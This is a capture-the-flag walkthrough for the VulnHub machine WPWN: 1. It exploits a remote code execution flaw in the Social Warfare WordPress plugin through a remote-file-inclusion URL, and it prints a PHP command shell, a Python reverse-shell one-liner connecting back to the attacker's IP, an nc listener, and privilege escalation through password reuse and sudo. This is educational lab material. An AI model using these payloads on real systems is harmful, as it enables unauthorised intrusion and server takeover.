WPWN: 1 VulnHub capture the flag walkthrough
Please note: I have used Oracle Virtual Box to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.
Follow these steps to finish the CTF:
- Getting the target machine’s IP address by running the VM
- Getting open port details by using the Nmap tool
- Enumerating HTTP service with Dirb utility
- Identifying vulnerability in WordPress
- Taking remote shell by exploiting remote code execution vulnerability
- Getting the root shell
The first step to start solving any CTF is to identify the target machine’s IP address. Since we are running a virtual machine in the same network, we can identify the target machine’s IP address by running the netdiscover command. The output of the command can be seen in the following screenshot. [CLICK IMAGES TO ENLARGE]
Command used: << netdiscover >>
In the above screenshot, we can see that we have identified the IP address of all the devices connected to our router, but due to security reasons, we have hidden the MAC address of my personal connected devices. Our target machine’s IP address that we will be working on throughout this challenge is 192.168.1.25 (the target machine’s IP address). We will be using 192.168.1.22 as the attacker IP address.
Note: The target machine’s IP address may be different in your case, as it is being assigned by the network DHCP.
After getting the target machine’s IP address, the next step is to find out the open ports and services available on the machine. We will use the Nmap tool for it, as it works effectively and is available on Kali Linux. The results can be seen below.
Command used: << nmap -sV -p- 192.168.1.25 >>
The Nmap output shows two ports on the target machine that have been identified as Open. In the Nmap command, we used the “-sV” switch for version enumeration. We also used the “-p-“ option for a full port scan. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is especially important to conduct a full port scan during the pentest or solve the CTF for maximum results.
However, in our case, two ports have been identified as open during the scan in which port 22 is being used for SSH. Port 80 is being used for HTTP.
In the next step, we will start with the HTTP port 80.
We opened the target machine’s IP address on the browser to see the running web application. It can be seen in the following screenshot.
As we can see in the above screenshot, there is a static page with a message which says that the goal is not just to get the root shell, but we have to read the root flag to complete it. So, let us run the Dirb utility to identify the hidden folders that can be seen in the following screenshot.
Command used: << dirb http://192.168.1.25/ >>
In the above screenshot, we can see the output of the Dirb utility, which has generated a large output. We analyzed all the identified directories and found a WordPress folder. Let’s open this folder into the browser.
We can see in the screenshot that there is a WordPress website that is not properly working. In the next step, we will run a WordPress vulnerability scanner to identify vulnerabilities.
Until now, we knew that our target machine was running the WordPress website. Let’s start the WPScan, which is available on Kali Linux and is a very good tool to identify vulnerable components in WordPress websites.
Command used: << wpscan –url http://192.168.1.25/wordpress >>
In the highlighted area of the above screenshot, we can see that the scanner has identified an outdated plugin. So, let us search over Google to see any vulnerabilities and their exploit.
The first Google result shows that the plugin is vulnerable to remote code execution. We open the exploit DB URL as follows.
As per the information given on the exploit-db page, the remote execution exploit is written in Python. So, let’s download the exploit on our attacker machine by using the wget utility, which can be seen in the below screenshot.
After downloading the exploit, we tried to execute it, but the exploit was broken and was showing errors. We spent some time debugging the error, but it was taking too long. During further research, we found that the vulnerability can also be exploited manually and the manual process was already explained on another website that can be seen in the following screenshot.
As per the details given on the website, we have to craft the payload and run it remotely by including a text.
We have to create a text file where we can write the command we want to execute on our target system. After that, we have put this file on the document root, start the apache server and include it in the URL. All the used commands can be seen in the following screenshot.
- << cat >> shell.txt <pre> system (‘cat /etc/passwd’)</pre> >>
- << /etc/init.d/apache2 start >>
- << ifconfig eth0 >>
As can be seen in the above screenshot, we create a text file where we put the command to read the /etc/passwd file. Then we started the apache. After that, we crafted the complete URL which we need to run on the browser.
http://192.168.1.25/wordpress/wp-admin/admin-post.php?swp_debug=load_options HYPERLINK “http://192.168.1.25/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.22/hehe/shell.txt”& HYPERLINK “http://192.168.1.25/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.22/hehe/shell.txt”swp_url=http://192.168.1.22/hehe/shell.txt.
In the above screenshot, we can see that our command was successfully executed on the target machine and we can see the content of /etc/passwd file. We analyzed the file and got to know there is a user named “takis” available on the target machine.
So far, we can execute the static commands on our target system. Let’s put PHP code in the file so we can command it by just putting it into the URL. The code can be seen in the following screenshot.
Command used: << cat >> <pre>system($_GET[cmd])</pre> >>
We have written a PHP code which takes “get” input through the parameter “cmd” and runs it into the machine. Let’s try to run the ls command through the URL as follows:
The output of the ls command can be seen as part of the HTML page. Now, let’s create a python shell to take the shell access. The python code can be seen in the following screenshot.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.22”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
This python code will open a TCP socket and connect back to the mentioned IP address followed by the port number. Let us run this code to take the shell connection.
Command used: << nc -lvp 1234 >>
First, we started the “Netcut” listener on our attacker machine. After that, we ran the python code through the URL which provided us the reverse shell connection. Now, let’s run the id command to see the privileges of the shell.
Command used: << id >>
As we can see above, we got limited shell access, so in the next step, we will try to get the root access.
Now, let’s enumerate the target machine with these privileges and try to gain further access. We started gathering information by running “etc/issue” and “uname –a” command to identify the operating system and kernel version information. The output of the command can be seen below.
- << cat /etc/issue >>
- << uname -a >>
We tried to research the above versions over the web to find a working exploit, but nothing of substance could be found. We continued exploring the target machine further and tried to access various informational files commonly found on a Linux machine.
During this, we found some interesting information in the “wp-config.php” file, which can be seen below.
As we can see in the wp-config file, we found the database password. This could be possible that the same password was used for various logins. Let’s try this password with the user “takis,” which we identified in the previous steps.
Command used: << su takis >>
The password worked successfully and now we are logged into the target machine as user “takis.” We can now access more files on the target machine. We find the user flag in the “takis” user directory. The flag “user.txt” can be seen in the following screenshot.
Command used: << cat user.txt >>
We have one more flag to go, the root flag. We used “sudo –l” command to check current user privileges. It turns out that the current user has full privilege over the system. So, we used the “su” command to get root access without requiring entering any password. The result can be seen in the screenshot given below.
- << sudo -l >>
- << sudo su >>
As we can see above, we now have root access to the target machine as the same was verified by running the “id” command. Let’s find the flag file and complete the challenge.
Command used: << cat /root/root.txt >>
There was a “root.txt” file in the “root” directory. But it seems that it is not the flag file, as can be seen in the message above. In the hint, the user means that the “root.txt” flag might be located in the USB files. So, let us dig in further.
Command used: << find . -name “root” 2>/dev/null >>
We decided to take help by using the “find” command to find all the directories that contained any file named “root.” The result gave us a huge output; however, there was only one path that had the “USB” folder included. We opened the “root” file and from there and were able to finally read the flag.
Command used: << cat /usr/games/USB/root >>
In the above screenshot, we can see the root flag. This completes the challenge.
WordPress Plugin Social Warfare < 3.5.3 – Remote Code Execution, Exploit Database https://www.exploit-db.com/exploits/46794
Social Warfare <= 3.5.2 – Unauthenticated Remote Code Execution (RCE), WPSCAN https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
WPWN: 1, VulnHub https://www.vulnhub.com/entry/wpwn-1,537/
WPWN: 1 (download), VulnHub https://download.vulnhub.com/wpwn/wpwnvm.zip
WPWN: 1 (torrent), VulnHub https://download.vulnhub.com/wpwn/wpwnvm.zip.torrent